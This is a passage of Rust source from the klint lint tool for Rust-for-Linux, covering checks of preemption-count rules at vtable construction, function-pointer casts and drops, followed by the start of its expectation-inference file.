let source_annotation = source_trait_ref
.principal()
.map(|x| self.cx.drop_preemption_count_annotation(x.def_id()))
.unwrap_or_default();
let target_annotation = target_trait_ref
.principal()
.map(|x| self.cx.drop_preemption_count_annotation(x.def_id()))
.unwrap_or_default();
let source_adjustment = source_annotation
.adjustment
.unwrap_or(crate::atomic_context::VDROP_DEFAULT.0);
let target_adjustment = target_annotation
.adjustment
.unwrap_or(crate::atomic_context::VDROP_DEFAULT.0);
let source_expectation = source_annotation
.expectation
.unwrap_or(crate::atomic_context::VDROP_DEFAULT.1);
let target_expectation = target_annotation
.expectation
.unwrap_or(crate::atomic_context::VDROP_DEFAULT.1);
if source_adjustment != target_adjustment
|| !source_expectation.contains_range(target_expectation)
{
let mut diag = self.cx.tcx.dcx().struct_span_err(
span,
"casting between traits with incompatible preemption count properties",
);
diag.help(format!(
"adjustment of `{}` is {} and expectation is {}",
source_ty, source_adjustment, source_expectation
));
diag.help(format!(
"while the expected adjustment of `{}` is {} and the expectation is {}",
target_ty, target_adjustment, target_expectation
));
self.cx.emit_with_use_site_info(diag);
return Ok(());
}
Ok(())
}
fn check_vtable_construction(
&mut self,
ty: Ty<'tcx>,
trait_ref: Option<ty::PolyExistentialTraitRef<'tcx>>,
span: Span,
) -> Result<(), Error> {
self.cx.call_stack.borrow_mut().push(UseSite {
instance: self.typing_env.as_query_input(self.instance),
kind: UseSiteKind::Vtable(span),
});
let result = self
.cx
.vtable_construction_check_indirect(self.typing_env.as_query_input((ty, trait_ref)));
self.cx.call_stack.borrow_mut().pop();
result
}
fn check_fn_pointer_cast(&mut self, instance: Instance<'tcx>, span: Span) -> Result<(), Error> {
self.cx.call_stack.borrow_mut().push(UseSite {
instance: self.typing_env.as_query_input(self.instance),
kind: UseSiteKind::PointerCoercion(span),
});
let result = self
.cx
.function_pointer_cast_check_indirect(self.typing_env.as_query_input(instance));
self.cx.call_stack.borrow_mut().pop();
result
}
fn check_rvalue(
&mut self,
rvalue: &mir::Rvalue<'tcx>,
location: Location,
) -> Result<(), Error> {
let span = self.body.source_info(location).span;
match *rvalue {
mir::Rvalue::Cast(
mir::CastKind::PointerCoercion(PointerCoercion::Unsize, _),
ref operand,
target_ty,
) => {
let target_ty = self.monomorphize(target_ty);
let source_ty = operand.ty(self.body, self.cx.tcx);
let source_ty = self.monomorphize(source_ty);
let (source_ty, target_ty) = crate::monomorphize_collector::find_tails_for_unsizing(
self.cx.tcx.at(span),
self.typing_env,
source_ty,
target_ty,
);
if let ty::Dynamic(trait_ty, ..) = target_ty.kind() {
if let ty::Dynamic(..) = source_ty.kind() {
// This is trait upcasting.
self.check_vtable_unsizing(source_ty, target_ty, span)?;
} else {
// This is unsizing of a concrete type to a trait object.
self.check_vtable_construction(source_ty, trait_ty.principal(), span)?;
}
}
}
mir::Rvalue::Cast(
mir::CastKind::PointerCoercion(PointerCoercion::ReifyFnPointer(_), _),
ref operand,
_,
) => {
let fn_ty = operand.ty(self.body, self.cx.tcx);
let fn_ty = self.monomorphize(fn_ty);
if let ty::FnDef(def_id, args) = *fn_ty.kind() {
let instance =
ty::Instance::try_resolve(self.cx.tcx, self.typing_env, def_id, args)
.unwrap()
.ok_or(Error::TooGeneric)?;
self.check_fn_pointer_cast(instance, span)?;
}
}
mir::Rvalue::Cast(
mir::CastKind::PointerCoercion(PointerCoercion::ClosureFnPointer(_), _),
ref operand,
_,
) => {
let source_ty = operand.ty(self.body, self.cx.tcx);
let source_ty = self.monomorphize(source_ty);
match *source_ty.kind() {
ty::Closure(def_id, args) => {
let instance = Instance::resolve_closure(
self.cx.tcx,
def_id,
args,
ty::ClosureKind::FnOnce,
);
self.check_fn_pointer_cast(instance, span)?;
}
_ => bug!(),
}
}
mir::Rvalue::ThreadLocalRef(def_id) => {
assert!(self.cx.is_thread_local_static(def_id));
self.check_static(def_id)?;
}
_ => (),
}
Ok(())
}
    /// Recursively check everything reachable from a global allocation:
    /// statics, nested constant memory, function pointers and vtables.
    fn check_alloc(&mut self, alloc_id: AllocId, span: Span) -> Result<(), Error> {
        match self.cx.global_alloc(alloc_id) {
            GlobalAlloc::Static(def_id) => {
                // Thread-local statics are handled via `Rvalue::ThreadLocalRef`
                // and must not show up as plain allocations.
                assert!(!self.cx.is_thread_local_static(def_id));
                self.check_static(def_id)?;
            }
            GlobalAlloc::Memory(alloc) => {
                // Constant memory can embed pointers to further allocations;
                // nesting depth is unbounded, so grow the native stack before
                // recursing.
                for inner in alloc.inner().provenance().provenances() {
                    rustc_data_structures::stack::ensure_sufficient_stack(|| {
                        self.check_alloc(inner.alloc_id(), span)
                    })?;
                }
            }
            GlobalAlloc::Function { instance, .. } => {
                // A function whose address ended up in constant data behaves
                // like a function-to-pointer cast.
                self.check_fn_pointer_cast(instance, span)?;
            }
            GlobalAlloc::VTable(ty, dyn_ty) => {
                self.check_vtable_construction(ty, dyn_ty.principal(), span)?;
            }
            GlobalAlloc::TypeId { .. } => {}
        }
        Ok(())
    }
fn check_const(&mut self, value: mir::ConstValue, span: Span) -> Result<(), Error> {
match value {
mir::ConstValue::Scalar(Scalar::Ptr(ptr, _size)) => {
self.check_alloc(ptr.provenance.alloc_id(), span)?;
}
mir::ConstValue::Indirect { alloc_id, .. }
| mir::ConstValue::Slice { alloc_id, meta: _ } => self.check_alloc(alloc_id, span)?,
_ => {}
}
Ok(())
}
    /// Check a terminator for uses that carry preemption count obligations:
    /// direct/tail calls, drops, and `sym` operands of inline assembly.
    ///
    /// Call and drop sites are pushed onto the shared use-site stack while the
    /// callee/destructor is checked, so that diagnostics can print where the
    /// use originated; the pop must happen before the `?` propagates.
    fn check_terminator(
        &mut self,
        terminator: &mir::Terminator<'tcx>,
        location: Location,
    ) -> Result<(), Error> {
        let span = self.body.source_info(location).span;
        let tcx = self.cx.tcx;
        match terminator.kind {
            mir::TerminatorKind::Call { ref func, .. }
            | mir::TerminatorKind::TailCall { ref func, .. } => {
                let callee_ty = func.ty(self.body, tcx);
                let callee_ty = self.monomorphize(callee_ty);
                if let ty::FnDef(def_id, args) = *callee_ty.kind() {
                    let instance =
                        ty::Instance::try_resolve(self.cx.tcx, self.typing_env, def_id, args)
                            .unwrap()
                            .ok_or(Error::TooGeneric)?;
                    self.cx.call_stack.borrow_mut().push(UseSite {
                        instance: self.typing_env.as_query_input(self.instance),
                        kind: UseSiteKind::Call(span),
                    });
                    let result = self
                        .cx
                        .instance_check(self.typing_env.as_query_input(instance));
                    // Pop before propagating so the stack stays balanced even
                    // on error.
                    self.cx.call_stack.borrow_mut().pop();
                    result?
                }
            }
            mir::TerminatorKind::Drop { ref place, .. } => {
                let ty = place.ty(self.body, self.cx.tcx).ty;
                let ty = self.monomorphize(ty);
                self.cx.call_stack.borrow_mut().push(UseSite {
                    instance: self.typing_env.as_query_input(self.instance),
                    kind: UseSiteKind::Drop {
                        drop_span: span,
                        place_span: self.body.local_decls[place.local].source_info.span,
                    },
                });
                let result = self.cx.drop_check(self.typing_env.as_query_input(ty));
                self.cx.call_stack.borrow_mut().pop();
                result?
            }
            mir::TerminatorKind::InlineAsm { ref operands, .. } => {
                for op in operands {
                    match *op {
                        mir::InlineAsmOperand::SymFn { ref value } => {
                            let fn_ty = self.monomorphize(value.const_.ty());
                            if let ty::FnDef(def_id, args) = *fn_ty.kind() {
                                let instance = ty::Instance::try_resolve(
                                    self.cx.tcx,
                                    self.typing_env,
                                    def_id,
                                    args,
                                )
                                .unwrap()
                                .ok_or(Error::TooGeneric)?;
                                // Taking a symbol's address in asm is treated
                                // like a function-to-pointer conversion.
                                self.check_fn_pointer_cast(instance, span)?;
                            }
                        }
                        mir::InlineAsmOperand::SymStatic { def_id } => {
                            self.check_static(def_id)?;
                        }
                        _ => {}
                    }
                }
            }
            mir::TerminatorKind::Assert { .. }
            | mir::TerminatorKind::UnwindTerminate { .. }
            | mir::TerminatorKind::Goto { .. }
            | mir::TerminatorKind::SwitchInt { .. }
            | mir::TerminatorKind::UnwindResume
            | mir::TerminatorKind::Return
            | mir::TerminatorKind::Unreachable => {}
            // These variants are lowered away before this analysis runs on
            // monomorphic MIR, so encountering one is a bug.
            mir::TerminatorKind::CoroutineDrop
            | mir::TerminatorKind::Yield { .. }
            | mir::TerminatorKind::FalseEdge { .. }
            | mir::TerminatorKind::FalseUnwind { .. } => bug!(),
        }
        Ok(())
    }
fn check_static(&mut self, def_id: DefId) -> Result<(), Error> {
if !self
.cx
.tcx
.should_codegen_locally(Instance::mono(self.cx.tcx, def_id))
{
return Ok(());
}
let span = self.cx.def_span(def_id);
if let Ok(alloc) = self.cx.eval_static_initializer(def_id) {
for prov in alloc.inner().provenance().provenances() {
self.check_alloc(prov.alloc_id(), span)?;
}
}
Ok(())
}
}
impl<'mir, 'tcx, 'cx> MirVisitor<'tcx> for MirNeighborVisitor<'mir, 'tcx, 'cx> {
    // Each visit method short-circuits once `self.result` holds an error, so
    // the first failure encountered is the one that is reported.
    fn visit_rvalue(&mut self, rvalue: &mir::Rvalue<'tcx>, location: Location) {
        if self.result.is_ok() {
            self.result = self.check_rvalue(rvalue, location);
        }
        if self.result.is_ok() {
            self.super_rvalue(rvalue, location);
        }
    }
    fn visit_const_operand(&mut self, constant: &mir::ConstOperand<'tcx>, location: Location) {
        if self.result.is_err() {
            return;
        }
        let const_ = self.monomorphize(constant.const_);
        match const_.eval(self.cx.tcx, self.typing_env, constant.span) {
            Ok(val) => {
                self.result = self.check_const(val, self.body.source_info(location).span);
            }
            // Already reported by the const evaluator; leave `result` as-is.
            Err(ErrorHandled::Reported(..)) => {}
            Err(ErrorHandled::TooGeneric(..)) => {
                self.result = Err(Error::TooGeneric);
            }
        }
    }
    fn visit_terminator(&mut self, terminator: &mir::Terminator<'tcx>, location: Location) {
        if self.result.is_ok() {
            self.result = self.check_terminator(terminator, location);
        }
        if self.result.is_ok() {
            self.super_terminator(terminator, location);
        }
    }
    // Locals themselves carry no obligations; overriding with a no-op avoids
    // the default traversal.
    fn visit_local(
        &mut self,
        _place_local: mir::Local,
        _context: mir::visit::PlaceContext,
        _location: Location,
    ) {
    }
}
impl<'tcx> AnalysisCtxt<'tcx> {
    /// Walk `body` with [`MirNeighborVisitor`] and report the first
    /// preemption-count rule violation found in its use sites.
    pub fn do_indirect_check(
        &self,
        typing_env: TypingEnv<'tcx>,
        instance: Instance<'tcx>,
        body: &Body<'tcx>,
    ) -> Result<(), Error> {
        let mut visitor = MirNeighborVisitor {
            cx: self,
            typing_env,
            instance,
            body,
            result: Ok(()),
        };
        visitor.visit_body(body);
        visitor.result
    }

    /// Recursion-guarded entry point wrapping [`Self::do_indirect_check`].
    ///
    /// Aborts with a fatal error if the use-site stack exceeds the recursion
    /// limit, and grows the native stack before recursing.
    pub fn indirect_check(
        &self,
        typing_env: TypingEnv<'tcx>,
        instance: Instance<'tcx>,
        body: &Body<'tcx>,
    ) -> Result<(), Error> {
        let depth = self.call_stack.borrow().len();
        if !self.recursion_limit().value_within_limit(depth) {
            self.emit_with_use_site_info(self.dcx().struct_fatal(format!(
                "reached the recursion limit while checking indirect calls for `{}`",
                PolyDisplay(&typing_env.as_query_input(instance))
            )));
        }
        rustc_data_structures::stack::ensure_sufficient_stack(|| {
            self.do_indirect_check(typing_env, instance, body)
        })
    }
}
// Warn when a function whose inferred preemption-count adjustment/expectation
// differs from the assumed function-pointer defaults is converted to a pointer.
memoize!(
    // Make this a query so that the same function is only reported once even if converted to pointers
    // in multiple sites.
    #[instrument(skip(cx), fields(poly_instance = %PolyDisplay(&poly_instance)), ret)]
    fn function_pointer_cast_check_indirect<'tcx>(
        cx: &AnalysisCtxt<'tcx>,
        poly_instance: PseudoCanonicalInput<'tcx, Instance<'tcx>>,
    ) -> Result<(), Error> {
        // The function itself must pass its own checks first.
        cx.instance_check(poly_instance)?;
        let adj = cx.instance_adjustment(poly_instance)?;
        let exp = cx.instance_expectation(poly_instance)?;
        // Indirect calls assume the default adjustment/expectation; a function
        // with different properties may be called through a pointer in a
        // context that violates them.
        if adj != crate::atomic_context::INDIRECT_DEFAULT.0
            || !exp.contains_range(crate::atomic_context::INDIRECT_DEFAULT.1)
        {
            let mut diag = cx.dcx().struct_warn(
                "converting this function to pointer may result in preemption count rule violation",
            );
            diag.help(format!(
                "`{}` is being converted to a pointer",
                PolyDisplay(&poly_instance)
            ));
            diag.help(format!(
                "adjustment of this function is inferred to be {} and expectation is inferred to be {}",
                adj, exp
            ));
            diag.help(format!(
                "while the adjustment for function pointers is assumed to be {} and the expectation be {}",
                crate::atomic_context::INDIRECT_DEFAULT.0,
                crate::atomic_context::INDIRECT_DEFAULT.1
            ));
            cx.emit_with_use_site_info(diag);
        }
        Ok(())
    }
);
// Check every method entry and the drop glue of a vtable against the
// preemption-count properties a dynamic dispatch assumes for them.
memoize!(
    // Make this a query so that the same vtable is only reported once even if
    // it is constructed in multiple sites.
    #[instrument(
        skip(cx, poly_ty_trait_ref),
        fields(
            poly_ty = %PolyDisplay(&poly_ty_trait_ref.typing_env.as_query_input(poly_ty_trait_ref.value.0)),
            trait_ref = ?poly_ty_trait_ref.value.1
        ),
        ret
    )]
    fn vtable_construction_check_indirect<'tcx>(
        cx: &AnalysisCtxt<'tcx>,
        poly_ty_trait_ref: PseudoCanonicalInput<
            'tcx,
            (Ty<'tcx>, Option<ty::PolyExistentialTraitRef<'tcx>>),
        >,
    ) -> Result<(), Error> {
        let PseudoCanonicalInput {
            typing_env,
            value: (ty, trait_ref),
        } = poly_ty_trait_ref;
        // Lazily created so that at most one warning is emitted per vtable;
        // all violations are attached to it as help notes.
        let mut diag = None;
        if let Some(principal) = trait_ref {
            let poly_trait_ref = principal.with_self_ty(cx.tcx, ty);
            assert!(!poly_trait_ref.has_escaping_bound_vars());
            // Walk the principal trait and all of its supertraits: the vtable
            // contains entries for each of them. `visited` de-duplicates
            // diamond-shaped supertrait graphs.
            let mut visited = PredicateSet::new(cx.tcx);
            let predicate = poly_trait_ref.upcast(cx.tcx);
            let mut stack: Vec<ty::PolyTraitRef<'tcx>> = vec![poly_trait_ref];
            visited.insert(predicate);
            while let Some(trait_ref) = stack.pop() {
                let super_traits = cx
                    .explicit_super_predicates_of(trait_ref.def_id())
                    .iter_identity_copied()
                    .filter_map(|(pred, _)| {
                        pred.instantiate_supertrait(cx.tcx, trait_ref)
                            .as_trait_clause()
                    });
                for supertrait in super_traits {
                    if visited.insert(supertrait.upcast(cx.tcx)) {
                        let supertrait = supertrait.map_bound(|t| t.trait_ref);
                        stack.push(supertrait);
                    }
                }
                for &entry in cx.own_existential_vtable_entries(trait_ref.def_id()) {
                    // Instantiate the method's generics from the trait ref;
                    // lifetimes are irrelevant here and get erased.
                    let args = trait_ref.map_bound(|trait_ref| {
                        GenericArgs::for_item(cx.tcx, entry, |param, _| match param.kind {
                            GenericParamDefKind::Lifetime => cx.tcx.lifetimes.re_erased.into(),
                            GenericParamDefKind::Type { .. }
                            | GenericParamDefKind::Const { .. } => {
                                trait_ref.args[param.index as usize]
                            }
                        })
                    });
                    let args = cx.normalize_erasing_late_bound_regions(typing_env, args);
                    // Entries whose where-clauses can never hold are vacant in
                    // the vtable; skip them.
                    let predicates = cx.predicates_of(entry).instantiate_own(cx.tcx, args);
                    if rustc_trait_selection::traits::impossible_predicates(
                        cx.tcx,
                        predicates.map(|(predicate, _)| predicate).collect(),
                    ) {
                        continue;
                    }
                    let instance = ty::Instance::try_resolve(cx.tcx, typing_env, entry, args)
                        .unwrap()
                        .ok_or(Error::TooGeneric)?;
                    let poly_instance = typing_env.as_query_input(instance);
                    cx.instance_check(poly_instance)?;
                    // Find the `DefId` of the trait method.
                    let trait_item = if let Some(impl_) = cx.impl_of_assoc(instance.def_id()) {
                        cx.associated_items(impl_)
                            .in_definition_order()
                            .find(|x| x.def_id == instance.def_id())
                            .unwrap()
                            .trait_item_def_id()
                            .unwrap()
                    } else {
                        // `impl_of_assoc` returns `None` if this instance is from the default impl of a trait method.
                        instance.def_id()
                    };
                    // A vcall through this entry assumes the annotation on the
                    // trait method (or the vcall defaults); the resolved impl
                    // must be compatible with that assumption.
                    let expected_adjustment = cx
                        .preemption_count_annotation(trait_item)
                        .adjustment
                        .unwrap_or(crate::atomic_context::VCALL_DEFAULT.0);
                    let expected_expectation = cx
                        .preemption_count_annotation(trait_item)
                        .expectation
                        .unwrap_or(crate::atomic_context::VCALL_DEFAULT.1);
                    let adj = cx.instance_adjustment(poly_instance)?;
                    let exp = cx.instance_expectation(poly_instance)?;
                    if adj != expected_adjustment || !exp.contains_range(expected_expectation) {
                        let diag = diag.get_or_insert_with(|| {
                            cx
                                .dcx()
                                .struct_warn("constructing this vtable may result in preemption count rule violation")
                        });
                        diag.help(format!(
                            "`{}` is constructed as part of `dyn {}`",
                            PolyDisplay(&poly_instance),
                            cx.def_path_str(principal.def_id())
                        ));
                        diag.help(format!(
                            "adjustment is inferred to be {} and expectation is inferred to be {}",
                            adj, exp
                        ));
                        diag.help(format!(
                            "while the expected adjustment for vtable is {} and the expectation is {}",
                            expected_adjustment, expected_expectation
                        ));
                    }
                }
            }
        }
        // Check destructor
        let poly_ty = typing_env.as_query_input(ty);
        let drop_annotation = trait_ref
            .map(|x| cx.drop_preemption_count_annotation(x.def_id()))
            .unwrap_or_default();
        let expected_adjustment = drop_annotation
            .adjustment
            .unwrap_or(crate::atomic_context::VDROP_DEFAULT.0);
        let expected_expectation = drop_annotation
            .expectation
            .unwrap_or(crate::atomic_context::VDROP_DEFAULT.1);
        let adj = cx.drop_adjustment(poly_ty)?;
        let exp = cx.drop_expectation(poly_ty)?;
        if adj != expected_adjustment || !exp.contains_range(expected_expectation) {
            let diag = diag.get_or_insert_with(|| {
                cx.dcx().struct_warn(
                    "constructing this vtable may result in preemption count rule violation",
                )
            });
            diag.help(format!(
                "drop glue of `{}` is constructed as part of `dyn {}`",
                PolyDisplay(&poly_ty),
                trait_ref
                    .map(|x| cx.def_path_str(x.def_id()))
                    .unwrap_or_default()
            ));
            diag.help(format!(
                "adjustment is inferred to be {} and expectation is inferred to be {}",
                adj, exp
            ));
            diag.help(format!(
                "while the expected adjustment for vtable is {} and the expectation is {}",
                expected_adjustment, expected_expectation
            ));
        }
        if let Some(diag) = diag {
            cx.emit_with_use_site_info(diag);
        }
        Ok(())
    }
);
// Check the drop glue of a type, structurally recursing into the types it is
// built from, and falling back to the generated drop shim where necessary.
memoize!(
    #[instrument(skip(cx), fields(poly_ty = %PolyDisplay(&poly_ty)), ret)]
    fn drop_check<'tcx>(
        cx: &AnalysisCtxt<'tcx>,
        poly_ty: PseudoCanonicalInput<'tcx, Ty<'tcx>>,
    ) -> Result<(), Error> {
        cx.drop_adjustment_check(poly_ty)?;
        cx.drop_expectation_check(poly_ty)?;
        let PseudoCanonicalInput {
            typing_env,
            value: ty,
        } = poly_ty;
        // If the type doesn't need drop, then it trivially refers to nothing.
        if !ty.needs_drop(cx.tcx, typing_env) {
            return Ok(());
        }
        match ty.kind() {
            // A closure's drop glue just drops its captured upvars.
            ty::Closure(_, args) => {
                return cx
                    .drop_check(typing_env.as_query_input(args.as_closure().tupled_upvars_ty()));
            }
            // Coroutine drops are non-trivial, use the generated drop shims instead.
            ty::Coroutine(..) => (),
            ty::Tuple(list) => {
                for ty in list.iter() {
                    cx.drop_check(typing_env.as_query_input(ty))?;
                }
                return Ok(());
            }
            // `Box<T>` drops the content, then frees via `Drop::drop` of `Box`.
            _ if let Some(boxed_ty) = ty.boxed_ty() => {
                cx.drop_check(typing_env.as_query_input(boxed_ty))?;
                let drop_trait = cx.require_lang_item(LangItem::Drop, DUMMY_SP);
                let drop_fn = cx.associated_item_def_ids(drop_trait)[0];
                let box_free = ty::Instance::try_resolve(
                    cx.tcx,
                    typing_env,
                    drop_fn,
                    cx.mk_args(&[ty.into()]),
                )
                .unwrap()
                .unwrap();
                cx.instance_check(typing_env.as_query_input(box_free))?;
                return Ok(());
            }
            ty::Adt(def, _) => {
                // For Adts, we first try to not use any of the args and just try the most
                // polymorphic version of the type.
                let poly_typing_env = TypingEnv::post_analysis(cx.tcx, def.did());
                let poly_args = cx
                    .erase_and_anonymize_regions(GenericArgs::identity_for_item(cx.tcx, def.did()));
                let poly_poly_ty = poly_typing_env
                    .as_query_input(cx.tcx.mk_ty_from_kind(ty::Adt(*def, poly_args)));
                if poly_poly_ty != poly_ty {
                    match cx.drop_check(poly_poly_ty) {
                        Err(Error::TooGeneric) => (),
                        v => return v,
                    }
                }
                // If that fails, we try to use the args.
                // Fallthrough to the MIR drop shim based logic.
            }
            // Dropping a trait object is checked at vtable construction sites.
            ty::Dynamic(..) => return Ok(()),
            // Array and slice drops only refer to respective element destructor.
            ty::Array(elem_ty, _) | ty::Slice(elem_ty) => {
                return cx.drop_check(typing_env.as_query_input(*elem_ty));
            }
            _ => return Err(Error::TooGeneric),
        }
        // Do not call `resolve_drop_in_place` because we need typing_env.
        let drop_in_place = cx.require_lang_item(LangItem::DropInPlace, DUMMY_SP);
        let args = cx.mk_args(&[ty.into()]);
        let instance = ty::Instance::try_resolve(cx.tcx, typing_env, drop_in_place, args)
            .unwrap()
            .unwrap();
        let poly_instance = typing_env.as_query_input(instance);
        assert!(matches!(
            instance.def,
            ty::InstanceKind::DropGlue(_, Some(_))
        ));
        if cx
            .call_stack
            .borrow()
            .iter()
            .rev()
            .any(|x| x.instance == poly_instance)
        {
            // Recursion encountered.
            return Ok(());
        }
        let mir = crate::mir::drop_shim::build_drop_shim(cx, instance.def_id(), typing_env, ty);
        cx.indirect_check(typing_env, instance, &mir)
    }
);
// Check an instance: its own adjustment/expectation rules, then everything
// reachable from its MIR body.
memoize!(
    #[instrument(skip(cx), fields(poly_instance = %PolyDisplay(&poly_instance)), ret)]
    pub fn instance_check<'tcx>(
        cx: &AnalysisCtxt<'tcx>,
        poly_instance: PseudoCanonicalInput<'tcx, Instance<'tcx>>,
    ) -> Result<(), Error> {
        let PseudoCanonicalInput {
            typing_env,
            value: instance,
        } = poly_instance;
        // Only instances codegenned locally need checking.
        if !cx.tcx.should_codegen_locally(instance) {
            return Ok(());
        }
        cx.instance_adjustment_check(poly_instance)?;
        cx.instance_expectation_check(poly_instance)?;
        match instance.def {
            // Rust built-in intrinsics does not refer to anything else.
            ty::InstanceKind::Intrinsic(_) => return Ok(()),
            // Empty drop glue, then it is a no-op.
            ty::InstanceKind::DropGlue(_, None) => return Ok(()),
            ty::InstanceKind::DropGlue(_, Some(ty)) => {
                return cx.drop_check(typing_env.as_query_input(ty));
            }
            // Can't check further here. Will be checked at vtable generation site.
            ty::InstanceKind::Virtual(_, _) => return Ok(()),
            _ => (),
        }
        if matches!(instance.def, ty::InstanceKind::Item(_)) {
            // First try checking the fully polymorphic version of this item,
            // so the memoized result covers all instantiations at once; fall
            // back to the concrete args only if that is too generic.
            let poly_typing_env = TypingEnv::post_analysis(cx.tcx, instance.def_id());
            let poly_args = cx.erase_and_anonymize_regions(GenericArgs::identity_for_item(
                cx.tcx,
                instance.def_id(),
            ));
            let poly_poly_instance =
                poly_typing_env.as_query_input(Instance::new_raw(instance.def_id(), poly_args));
            let generic = poly_poly_instance == poly_instance;
            if !generic {
                match cx.instance_check(poly_poly_instance) {
                    Err(Error::TooGeneric) => (),
                    expectation => return expectation,
                }
            }
        }
        // Foreign functions will not directly refer to Rust items
        if cx.is_foreign_item(instance.def_id()) {
            return Ok(());
        }
        if cx
            .call_stack
            .borrow()
            .iter()
            .rev()
            .any(|x| x.instance == poly_instance)
        {
            // Recursion encountered.
            return Ok(());
        }
        let mir = cx.analysis_instance_mir(instance.def);
        cx.indirect_check(typing_env, instance, mir)
    }
);
| rust | Apache-2.0 | 2651b747c68a5fefc0ff72f3b2a9395e1c75dcd7 | 2026-01-04T20:21:44.735699Z | false |
Rust-for-Linux/klint | https://github.com/Rust-for-Linux/klint/blob/2651b747c68a5fefc0ff72f3b2a9395e1c75dcd7/src/preempt_count/expectation.rs | src/preempt_count/expectation.rs | // Copyright Gary Guo.
//
// SPDX-License-Identifier: MIT OR Apache-2.0
use rustc_errors::{EmissionGuarantee, MultiSpan};
use rustc_hir::LangItem;
use rustc_hir::def_id::CrateNum;
use rustc_middle::mir::{self, Body, TerminatorKind};
use rustc_middle::ty::{
self, GenericArgs, Instance, PseudoCanonicalInput, Ty, TypingEnv, TypingMode,
};
use rustc_mir_dataflow::Analysis;
use rustc_span::DUMMY_SP;
use rustc_trait_selection::infer::TyCtxtInferExt;
use super::dataflow::AdjustmentComputation;
use super::{Error, ExpectationRange};
use crate::ctxt::AnalysisCtxt;
use crate::diagnostic::PolyDisplay;
use crate::diagnostic::use_stack::{UseSite, UseSiteKind};
use crate::lattice::MeetSemiLattice;
impl<'tcx> AnalysisCtxt<'tcx> {
    /// Query the preemption count expectation range of a certain `terminator` invocation.
    ///
    /// Calls use the callee's annotated or inferred expectation (indirect
    /// calls fall back to the indirect-call default); drops use the dropped
    /// type's inferred expectation; all other terminators have no expectation.
    pub fn terminator_expectation(
        &self,
        typing_env: TypingEnv<'tcx>,
        instance: Instance<'tcx>,
        body: &Body<'tcx>,
        terminator: &mir::Terminator<'tcx>,
    ) -> Result<ExpectationRange, Error> {
        Ok(match &terminator.kind {
            TerminatorKind::Call { func, .. } => {
                let callee_ty = func.ty(body, self.tcx);
                let callee_ty = instance.instantiate_mir_and_normalize_erasing_regions(
                    self.tcx,
                    typing_env,
                    ty::EarlyBinder::bind(callee_ty),
                );
                if let ty::FnDef(def_id, args) = *callee_ty.kind() {
                    if let Some(v) = self.preemption_count_annotation(def_id).expectation {
                        // Fast path, no need to resolve the instance.
                        // This also avoids `TooGeneric` when def_id is a trait method.
                        v
                    } else {
                        let callee_instance =
                            ty::Instance::try_resolve(self.tcx, typing_env, def_id, args)
                                .unwrap()
                                .ok_or(Error::TooGeneric)?;
                        // Push the use site so callee diagnostics can show a
                        // backtrace; popped again before returning.
                        self.call_stack.borrow_mut().push(UseSite {
                            instance: typing_env.as_query_input(instance),
                            kind: UseSiteKind::Call(terminator.source_info.span),
                        });
                        let result =
                            self.instance_expectation(typing_env.as_query_input(callee_instance));
                        self.call_stack.borrow_mut().pop();
                        result?
                    }
                } else {
                    // Indirect call: assume the default expectation.
                    crate::atomic_context::INDIRECT_DEFAULT.1
                }
            }
            TerminatorKind::Drop { place, .. } => {
                let ty = place.ty(body, self.tcx).ty;
                let ty = instance.instantiate_mir_and_normalize_erasing_regions(
                    self.tcx,
                    typing_env,
                    ty::EarlyBinder::bind(ty),
                );
                self.call_stack.borrow_mut().push(UseSite {
                    instance: typing_env.as_query_input(instance),
                    kind: UseSiteKind::Drop {
                        drop_span: terminator.source_info.span,
                        place_span: body.local_decls[place.local].source_info.span,
                    },
                });
                let result = self.drop_expectation(typing_env.as_query_input(ty));
                self.call_stack.borrow_mut().pop();
                result?
            }
            _ => ExpectationRange::top(),
        })
    }
    /// Locate the terminator in `body` that violates `expected` and attach
    /// explanatory notes to `diag`.
    ///
    /// This mirrors `do_infer_expectation` in reverse: the expectation is
    /// already known, and we scan the body (with the dataflow-computed
    /// adjustment at each block) for the first call/drop whose expectation
    /// cannot contain it, then recurse into that callee/destructor.
    /// Must only be called when a violation is known to exist in this body.
    #[instrument(skip(self, typing_env, body, diag), fields(instance = %PolyDisplay(&typing_env.as_query_input(instance))), ret)]
    pub fn report_body_expectation_error<G: EmissionGuarantee>(
        &self,
        typing_env: TypingEnv<'tcx>,
        instance: Instance<'tcx>,
        body: &Body<'tcx>,
        expected: ExpectationRange,
        span: Option<MultiSpan>,
        diag: &mut rustc_errors::Diag<'_, G>,
    ) -> Result<(), Error> {
        let mut analysis_result = AdjustmentComputation {
            checker: self,
            body,
            typing_env,
            instance,
        }
        .iterate_to_fixpoint(self.tcx, body, None)
        .into_results_cursor(body);
        for (b, data) in rustc_middle::mir::traversal::reachable(body) {
            if data.is_cleanup {
                continue;
            }
            let expectation =
                self.terminator_expectation(typing_env, instance, body, data.terminator())?;
            // Special case for no expectation at all. No need to check adjustment here.
            if expectation == ExpectationRange::top() {
                continue;
            }
            analysis_result.seek_to_block_start(b);
            let adjustment = analysis_result.get().into_result()?;
            let call_expected = expected + adjustment;
            if expectation.contains_range(call_expected) {
                continue;
            }
            // This call violates the expectation rules. Go check further.
            match &data.terminator().kind {
                TerminatorKind::Call { func, .. } => {
                    let mut span =
                        span.unwrap_or_else(|| data.terminator().source_info.span.into());
                    let callee_ty = func.ty(body, self.tcx);
                    let callee_ty = instance.instantiate_mir_and_normalize_erasing_regions(
                        self.tcx,
                        typing_env,
                        ty::EarlyBinder::bind(callee_ty),
                    );
                    if let ty::FnDef(def_id, args) = *callee_ty.kind() {
                        if let Some(v) = self.preemption_count_annotation(def_id).expectation {
                            // NOTE: for trait methods, the check above only checks for annotation
                            // on trait method, but not on impl. After resolution below, we need to
                            // check again for preemption count annotation!
                            if !span.has_primary_spans() {
                                span = self.def_span(def_id).into();
                            }
                            diag.span_note(
                                span,
                                format!(
                                    "which may call this function with preemption count {}",
                                    expected
                                ),
                            );
                            diag.note(format!("but the callee expects preemption count {}", v));
                            return Ok(());
                        } else {
                            let callee_instance =
                                ty::Instance::try_resolve(self.tcx, typing_env, def_id, args)
                                    .unwrap()
                                    .ok_or(Error::TooGeneric)?;
                            if !span.has_primary_spans() {
                                span = self.def_span(callee_instance.def_id()).into();
                            }
                            // Annotation on the resolved impl method stops the
                            // recursion here with a direct note.
                            if let Some(v) = self
                                .preemption_count_annotation(callee_instance.def_id())
                                .expectation
                            {
                                diag.span_note(
                                    span,
                                    format!(
                                        "which may call this function with preemption count {}",
                                        expected
                                    ),
                                );
                                diag.note(format!("but the callee expects preemption count {}", v));
                                return Ok(());
                            }
                            self.call_stack.borrow_mut().push(UseSite {
